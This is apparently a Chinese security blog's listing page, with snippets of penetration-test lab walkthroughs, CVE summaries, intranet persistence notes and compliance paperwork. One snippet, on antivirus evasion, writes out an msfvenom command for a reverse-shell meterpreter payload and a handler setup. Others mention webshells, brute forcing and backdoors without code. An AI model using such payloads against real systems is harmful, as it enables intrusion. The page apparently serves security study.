- 博客(38)
- 资源 (33)
- 收藏
- 关注
RSS订阅原创 pWnOS: 2.0 - linux
目录靶机地址信息收集Whatweb 查是否是CMS访问80页面IsIntS目录遍历PHP信息版本搜索漏洞利用hydra 爆破web登录页面尝试错误爆破:killerbeesareflying报错注入输入账户密码登录blog查看源码注入读取文件load_fileinto outfile 函数命令执行反弹shell [一]反弹shell [二]提权直接登录成功(二)查看blog源码MSF登录成功上传php-rev
2020-12-28 09:31:43
475
原创 symfonos: 1
目录NameDownload信息收集访问80端口查看robots.txt 无果目录遍历发现139、445的smb插件wordpress 漏洞进行文件包含mail-masta文件包含mali文件查看写入木马文件25端口nc 反弹拿shell交互pythonPATH变量提权proof.txtNameName: symfonos: 1 Date release: 29 Jun 2019 Author:Zayotic Series:...
2020-12-26 21:22:59
953
原创 FourEye 免杀
生成木马root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=444 -f raw -o shellcode.rawmsf5 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf5 exploit(multi/handler) > se..
2020-12-25 19:58:29
711
原创 Vulhub —— Node
目录信息收集查看页面源码home.jslatest用户名密码tom 账户users 目录进行登录下载备份文件暴力破解压缩密码解压文件内核版本提权信息收集root@kali:~# nmap -Pn -A -p- 192.168.19.135Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-23 20:22 ESTNmap scan report for bogon (192.168.19...
2020-12-25 09:08:32
291
原创 vulhub 学习下载
New Boxes (March 2020): DC 9: https://www.vulnhub.com/entry/dc-9,412/ Digitalworld.local (Bravery): https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Digitalworld.local (Development): https://www.vulnhub.com/entry/digitalworldlocal-develop
2020-12-24 13:51:38
759
原创 Vulhub —— MERCY-v2 实战
目录目标环境过程信息收集nmap扫描访问8080端口页面目录遍历dirbgobustermanager页面扫描nikto枚举 用户enum4linux版本信息搜索tomcat 漏洞访问共享搜索漏洞rips 0.53文件包含配置信息tomcat7/tomcat-users.xml获得用户名和密码文件上传获取shell信息扫描LinEnum.sh扫描到的用户:linux-exploit-suggester.sh 收集
2020-12-24 07:15:45
1316
原创 tun虚拟网卡没有安装解决之道
目录描述过程一、sstap 会提示你虚拟网卡没有安装;二、还有会是这样的:病毒和威胁防护中无法启动;引擎不可以用等等,以及会显示需要IT管理员去处理;等等报错的信息; 系统升级地方会显示:Windows Defender Antivirus 的安全智能更新 - KB2267602 (版本 1.305.2147.0) - 错误 0xc8000442Windows Defender报错;三、还有就是会出现你搜自己家的WIFI搜不到,电脑端都不会显示WIFI名字;解决方...
2020-12-15 09:06:21
15545
5
原创 内网-最后一章 Cobalt Strike
Cobalt Strike 是一款商业软件,安装java 环境 部署 TeamServer 服务器启动其中连接密码就是teamserver 所设置的下面就是Cobalt Strike 主界面利用Cobalt Strike 获取第一个Beacon...
2020-12-11 22:30:18
192
原创 等保-机房项目验收方法
验收依据:国标:电子计算机机房设计规范(GB50174-93)国标:计算站场地技术条件(GB2887-89)公安部:计算机信息系统实体安全技术要求(GA371-2001)建筑内部装修设计防火规范(GB50222-95)建筑设计防火规范(GBJ16-87)低压配电装置及线路设计规范(GBJ54-83)民用建筑电气设计规范(JGJ/T16-9F210)电气装置安装工程接地装置施工及验收规范(GB50169-92)火灾自动报警系统设计规范 (GB 50116-...
2020-12-11 22:12:31
1699
原创 等保-机房工程( 机房建设) 验 收 报 告
机房工程( 机房建设)验 收 报 告项目名称:项目编号:项目地点:验收时间:机房工程验收报告工程名称 工程地址 建设单位 设计单位 中标单位 开工日期 竣工日期 验收日期 主要工程量概述1、工程概述: 工程项目经过建设单位和施工单位***天紧张而有序的统筹、部 署,现场技术人员加班加点认真施工,克服了工期短,施工场地供电、照 明受限等困难条件,在建设单位有关领导、相关科室和一建项目组的大力支持、协调配合,使得工程得以顺利的开展的实施,并在规...
2020-12-11 21:52:12
1022
原创 等保-物理安全层面
物理安全层面1、机房进出登记表 ( 记录人员进出机房的情况, 包含姓名、 身份证号、 进出的日期时间、 携带的设备、事由、陪同人员等 )2、机房进出申请审批表 (带有申请审批记录的机房出入授权表)3、机房安全验收报告 (针对自建机房) / 机房环境租用协议 (针对服务器托管在第三方机房)4、机房环境巡检记录IDC机房出入申请单部门 文件编号 申请人 ...
2020-12-11 21:48:59
431
原创 CVE-2020-9402 —— Django GIS SQL注入漏洞
介绍Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。SQL注入过程:...
2020-12-11 09:21:43
414
原创 CVE-2020-5421 —— Spring Framework反射型文件下载漏洞
目录Spring Framework组件介绍描述影响版本过程修复建议CVE-2020-5421 | Spring Framework反射型文件下载漏洞Spring Framework组件介绍Spring Framework 是一个开源的 Java/Java EE 全功能栈(full-stack)的应用程序框架,以 Apache 许可证形式发布,也有 .NET 平台上的移植版本。Spring Framework 提供了一个简易的开发方式,这种开发方式可以避免那些可能致使底层
2020-12-10 10:25:24
791
原创 CVE-2020-13948 —— Apache Superset 远程代码执行漏洞
目录Apache Superset组件介绍描述影响版本过程修复建议CVE-2020-13948 | Apache Superset 远程代码执行漏洞Apache Superset组件介绍Apache Superset 是Airbnb公司开源的数据分析与可视化平台(曾用名Caravel、Panoramix),该工具主要特点是可自助分析、自定义仪表盘、分析结果可视化(导出)、用户/角色权限控制,还集成了SQL编辑器,可以进行SQL编辑查询等操作。描述9月15日Apac
2020-12-10 10:22:51
552
原创 CVE-2020-4643 —— IBM WebSphere Application Server XXE 漏洞
目录IBM WebSphere Application Server组件介绍描述影响版本过程修复建议CVE-2020-4643 | IBM WebSphere Application Server XXE 漏洞IBM WebSphere Application Server组件介绍IBM WebSphere Application Server 是一种高性能的 Java 应用服务器,可用于构建、运行、集成、保护和管理内部部署和/或外部部署的动态云和 Web 应用。它不仅能
2020-12-10 10:20:44
467
原创 CVE-2020-26945 —— MyBatis 远程代码执行漏洞
目录MyBatis组件介绍描述影响版本过程修复建议CVE-2020-26945 | MyBatis 远程代码执行漏洞MyBatis组件介绍MyBatis 本是Apache的一个开源项目iBatis, 2010年这个项目由Apache Software Foundation 迁移到了Google Code,并且改名为MyBatis。MyBatis是一款优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射。MyBatis避免了几乎所有的JDBC代码和手动设置参数以及
2020-12-10 10:18:17
1022
原创 CVE-2020-11800 —— Zabbix 远程代码执行漏洞
目录Zabbix 组件介绍描述影响版本过程修复建议CVE-2020-11800 | Zabbix 远程代码执行漏洞Zabbix 组件介绍Zabbix是一个基于WEB界面的分布式系统监视以及网络监视的企业级开源解决方案。Zabbix能监视各种网络参数,保证服务器系统的安全运营,并提供灵活的通知机制以便系统管理员快速定位和解决存在的各种问题。它由两部分构成,Zabbix Server与可选组件Zabbix Agent。Zabbix server可以通过SNMP,Za
2020-12-10 10:16:11
849
2
原创 CVE-2020-11998 —— Apache ActiveMQ 远程代码执行漏洞
目录Apache ActiveMQ 组件介绍描述影响版本过程修复建议CVE-2020-11998 | Apache ActiveMQ 远程代码执行漏洞Apache ActiveMQ 组件介绍Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。描述9月10日Apache软件基金会发布安全公告,修复了Apache Active.
2020-12-10 10:13:22
1178
2
原创 CVE-2020-25213 —— WordPress wp-file-manager 文件上传漏洞
CVE-2020-25213 | WordPress wp-file-manager 文件上传漏洞WordPress 插件WP-file-manager介绍WP-file-manager是一个帮助WordPress管理员管理其站点上文件的插件。该插件包含一个附加库elFinder,它是一个开放源代码文件管理器,用来创建简单的文件管理界面,并提供文件管理器背后的核心功能。WP-file-manager插件以引入漏洞的方式使用了该库。描述WordPress 6.9之前的文件管理器(wp-fi
2020-12-10 10:12:33
8361
2
原创 CVE-2020-15012 —— Nexus Repository Manager 2 目录遍历漏洞
目录Nexus Repository Manager 2组件介绍漏洞描述影响版本过程修复建议CVE-2020-15012 | Nexus Repository Manager 2 目录遍历漏洞Nexus Repository Manager 2组件介绍Sonatype Nexus Repository Manager 2(NXRM)是美国Sonatype公司的一款Maven仓库管理器,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建Maven 仓库私服,在代理远程
2020-12-10 10:11:42
379
原创 CVE-2020-1472 —— NetLogon 特权提升漏洞
CVE-2020-1472——NetLogon 特权提升漏洞https://github.com/dirkjanm/CVE-2020-1472https://github.com/SecuraBV/CVE-2020-1472描述准备环境攻击机:kali2020 受害机:Windows Server 2008本地搭建域环境过程...
2020-12-10 10:10:56
111
原创 CVE-2020-17144 —— Microsoft Exchange Server 2010中的远程代码执行漏洞
目录描述影响环境过程修复建议参考链接描述漏洞是由程序未正确校验cmdlet参数引起。经过身份验证的攻击者利用该漏洞可实现远程代码执行。该漏洞和 CVE-2020-0688 类似,也需要登录后才能利用,不过在利用时无需明文密码,只要具备 NTHash 即可。除了常规邮件服务与 OWA外,EWS接口也提供了利用所需的方法。漏洞的功能点本身还具备持久化功能。影响Microsoft Exchange Server 2010 Service Pack 3 Updat
2020-12-10 10:09:46
653
原创 Thinkphp的CMS审计
Thinkphp的CMS审计下载地址 :yxtcmf6.1YxtCMF易学堂在线学习系统 v6.1先学形再学意,形意相通,融汇贯通 描述 该学习系统采用了cms的结构,去了解一下查看存在的问题得到及时解决; 思路 通篇可以通读采用了php+mysql的形式;去根据敏感函数进行回溯; 工具 seay源代码审计系统、sublime、notepad++ 等等 过程 结果 参考链接
2020-12-09 15:57:48
306
原创 内网 —— 跨域攻击
目录跨域攻击的方法利用域信任关系的跨域攻击 域信任关系 获取域信息 利用域信任密钥获取目标域的权限 利用krbtgt 散列值获取目标域的权限 外部信任和林信任 利用无约束委派 和 MS-RPRN 获取信任林权限防范跨域攻击跨域攻击的方法都有自己的内网,一般通过域林进行共享资源。根据不同职能区分利用域信任关系的跨域攻击 域信任关系 获取域信息 利用域信任密钥获取目标域的权限...
2020-12-09 15:55:12
715
原创 内网权限维持 —— 后门
目录操作系统后门粘滞键注册表注入计划任务meterpreterCymothoaWMI型web 后门Nishang 下的webshellweevelywebacooASPX meterpreterPHP meterpreter域控制器权限持久化DSRM 域后门SSP 维持域控权限SID History 域后门Golden TicketSilver TicketSkeleton KeyHook PasswordChangeNot
2020-12-09 15:47:32
996
原创 CVE-2020-14386 —— Linux kernel权限提升漏洞
CVE-2020-14386 | Linux kernel权限提升漏洞触发该漏洞的PoC代码参见:https://www.openwall.com/lists/oss-security/2020/09/03/3漏洞利用::https://unit42.paloaltonetworks.com/cve-2020-14386/研究人员提出的补丁参见:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/
2020-12-09 11:52:08
726
原创 CVE-2020-13957 —— Apache Solr 未授权文件上传漏洞
CVE-2020-13957 | Apache Solr 未授权文件上传漏洞Apache Solr 组件介绍Apache Solr是一个开源的搜索服务器。具有高度可靠、可伸缩和容错的,提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能。Solr为世界上许多的互联网站点提供搜索和导航功能。Solr使用Java语言开发,主要基于HTTP和Apache Lucene实现。Apache Solr中存储的资源是以Document 为对象进行存储的。每个文档由一系列的 Fi.
2020-12-09 11:27:01
343
原创 无回显渗透总结
无回显渗透总结描述: 最近和某安全圈的大佬进行了交流,涉及到无回显的问题;虽然自己答对了一些内容,但自我感觉总是差了那么一点;让我这个追求极致的心情,无法释怀;于是,现在总结下无回显的情况。搜集相关内容进行整合;思路:利用ping 利用curl 利用whois 利用cancel dnslog注入 无回显漏洞测试辅助平台 (Spring Boot + Spring Security + Netty) 尝试反弹shell ...
2020-12-09 10:31:58
368
原创 网络层IPV6隧道技术
常用于在访问受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的数据传输一般的网络通信,先在两台机器之间建立tcp连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备,软 硬件 防火墙甚至入侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。。隧道:就是...
2020-12-09 09:52:51
249
1
原创 CVE-2020-16898 —— Windows TCP/IP远程执行代码漏洞
CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞发布时间:2020年10月13日MITER CVE-2020-168981、描述Windows TCP / IP堆栈不正确地处理ICMPv6路由器播发数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将特制的ICMPv6路由器广告数据包发送到远程Windows计算机。2、环境3、过程4、修复建议...
2020-12-09 09:35:35
221
原创 CVE-2020-1971—— OpenSSL 拒绝服务漏洞
描述2020年12月09日,360CERT监测发现 openssl发布了 openssl 拒绝服务漏洞的风险通告,该漏洞编号为 CVE-2020-1971,漏洞等级:高危,漏洞评分:7.5。OpenSSL在处理 EDIPartyName(X.509 GeneralName类型)时,使用的函数GENERAL_NAME_cmp中存在一处空指针解引用。当使用该函数进行比较的两个参数都包含EDIPartyName时触发该漏洞。GENERAL_NAME_cmp函...
2020-12-09 09:23:24
1156
1
原创 CVE-2020-17530 —— Apache Struts远程代码执行漏洞
描述Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。提醒我校Apache Struts用户尽快采取安全措施阻止漏洞攻击。环境漏洞被利用可能导致远程代码执行。影响版本Struts 2.0.0 - Struts2.5.25过程...
2020-12-08 20:47:28
2111
8
原创 CVE-2020-12648 & TinyMCE 跨站脚本(XSS)漏洞
目录描述 原理环境过程参考链接描述 Tiny Technologies TinyMCE是美国Tiny Technologies公司的一款开源、轻量级的富文本编辑器,支持目前流行的各种浏览器,由JavaScript写成。它在现在运行于众多内容管理系统(CMS)中,比如wordpress,可为成千上万的网站提供支持。Tin...
2020-12-08 20:29:40
1676
原创 pocsuite3 工具使用
目录描述功能介绍使用环境下载应用Pocsuite命令行模式pocsuite3 编写POC脚本批量验证方式pocsuite3 编写EXP脚本pocsuite3 反弹shell 形式pocsuite3 编写console形式PocSuite3从Seebug加载PoC文件PocSuite3从ZoomEye加载多个测试目标PocSuite3从Shodan加载多个分析目标POC注意事项Windows下Pocsuite写日志url带冒号报错问题.
2020-12-08 18:13:01
3743
3
原创 Flask 模板注入漏洞
目录描述环境安装flask原理沙盒逃逸方式进行命令执行直接通过GET方式进行命令执行过程描述Flask(也被称为“microframework”) 是一个微型的Python开发的Web框架,基于Werkzeug WSGI工具箱和Jinja2 模板引擎。 Flask使用起来非常简单,应用Extension增加其他功能:ORM、窗体验证工具、文件上传、各种开放式身份验证技术。环境安装flask>>> pip3 install Flask>&
2020-12-08 18:10:53
1391
CVE-2020-14882 Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0
2022-05-03
在CVE-2021-31805漏洞中,仍然存在部分标签属性会造成攻击者恶意构造的OGNL表达式执行,导致远程代码执行
2022-05-03
HTTP协议.pptx
2020-12-10
netdiscover.ppt
2020-12-10
渗透中关于dns的奇技淫巧.pdf
2020-12-10
[超长消息]SSRF URL fo.pdf
2020-12-10
无线密码攻击和防护基础教程v2018.1试读大学霸pdf
2020-12-08
实战攻防演习之蓝军视角下的防御体系构建pdf
2020-12-07
APP评估的那些事情之pdf
2020-12-07
狙击受限区域之隧道应用pdf
2020-12-06
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人